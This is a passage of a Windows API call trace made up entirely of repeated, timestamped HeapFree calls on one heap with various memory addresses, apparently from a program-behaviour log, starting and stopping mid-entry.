hHeap=0x6a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.844] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0172.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0172.846] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0172.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0172.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0172.852] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0172.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0172.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0172.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0172.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0172.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0172.991] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0172.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0172.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0172.996] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0172.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4610f98 | out: hHeap=0x6a0000) returned 1 [0172.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0172.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4524fd8 | out: hHeap=0x6a0000) returned 1 [0172.997] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4514fd0 | out: hHeap=0x6a0000) returned 1 [0172.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0172.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0172.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0172.999] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.010] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.019] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4672510 | out: hHeap=0x6a0000) returned 1 [0173.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.024] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4684f40 | out: hHeap=0x6a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44f0060 | out: hHeap=0x6a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0173.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x3db0950 | out: hHeap=0x6a0000) returned 1 [0173.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x457bee8 | out: hHeap=0x6a0000) returned 1 [0173.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.241] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.243] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.244] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.247] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.248] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.249] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45aefd0 | out: hHeap=0x6a0000) returned 1 [0173.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0173.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45cf6e0 | out: hHeap=0x6a0000) returned 1 [0173.731] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4694f48 | out: hHeap=0x6a0000) returned 1 [0173.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0173.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4662508 | out: hHeap=0x6a0000) returned 1 [0174.011] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.012] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.013] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.015] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.016] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.017] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0174.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x45df6e8 | out: hHeap=0x6a0000) returned 1 [0174.361] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.369] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.403] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.416] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.421] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.438] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.439] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.440] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.445] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.446] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.450] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.451] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.455] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.457] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.458] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.461] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4640fb0 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.462] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x5131058 | out: hHeap=0x6a0000) returned 1 [0174.470] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.849] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.856] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.859] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.861] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.862] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.864] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.865] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.866] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.868] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.869] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.874] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4534fe0 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x46a6f60 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4620fa0 | out: hHeap=0x6a0000) returned 1 [0174.876] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4504fc8 | out: hHeap=0x6a0000) returned 1 [0174.886] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.887] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.895] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.910] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.912] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.914] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.916] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x4630fa8 | out: hHeap=0x6a0000) returned 1 [0174.919] HeapFree (in: 